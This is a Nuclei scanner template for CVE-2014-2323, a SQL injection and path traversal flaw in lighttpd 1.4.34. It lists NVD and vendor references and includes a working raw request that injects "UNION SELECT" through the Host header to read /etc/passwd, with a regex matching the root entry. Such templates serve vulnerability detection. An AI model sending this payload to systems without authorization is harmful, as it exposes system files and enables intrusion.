nuclei-templates/cves/2014/CVE-2014-2323.yaml

33 lines
983 B
YAML

id: CVE-2014-2323
info:
name: Lighttpd 1.4.34 SQL Injection and Path Traversal
author: geeknik
severity: critical
description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-2323
- https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
- http://www.lighttpd.net/2014/3/12/1.4.35/
- http://seclists.org/oss-sec/2014/q1/561
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-2323
cwe-id: CWE-89
tags: cve,cve2014,sqli,lighttpd,injection
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host: [::1]' UNION SELECT '/
unsafe: true
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
# Enhanced by mp on 2022/02/24